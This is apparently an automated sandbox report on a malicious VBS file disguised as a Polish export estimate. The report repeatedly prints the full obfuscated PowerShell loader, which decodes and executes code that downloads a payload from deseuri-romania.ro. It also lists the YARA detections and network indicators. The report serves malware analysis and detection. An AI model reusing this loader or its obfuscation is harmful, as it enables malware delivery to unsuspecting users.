              Source: global trafficHTTP traffic detected: GET /Bennington.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: deseuri-romania.roConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: deseuri-romania.ro
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://deseuri-romania.ro
              Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB_q
              Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deseuri-romania.ro
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deseuri-romania.ro/Bennington.jpbP
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deseuri-romania.ro/Bennington.jpbXR0l
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7608.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7852.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$cJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: Szacunek IMP29575 za eksport z ostatniego kwartalu.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6147
              Source: unknownProcess created: Commandline size = 6147
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6147Jump to behavior
              Source: amsi64_7608.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7852.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Ghastily.KriJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwyz3jwf.her.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;cracking.exe&apos;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7608
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7852
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$cJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
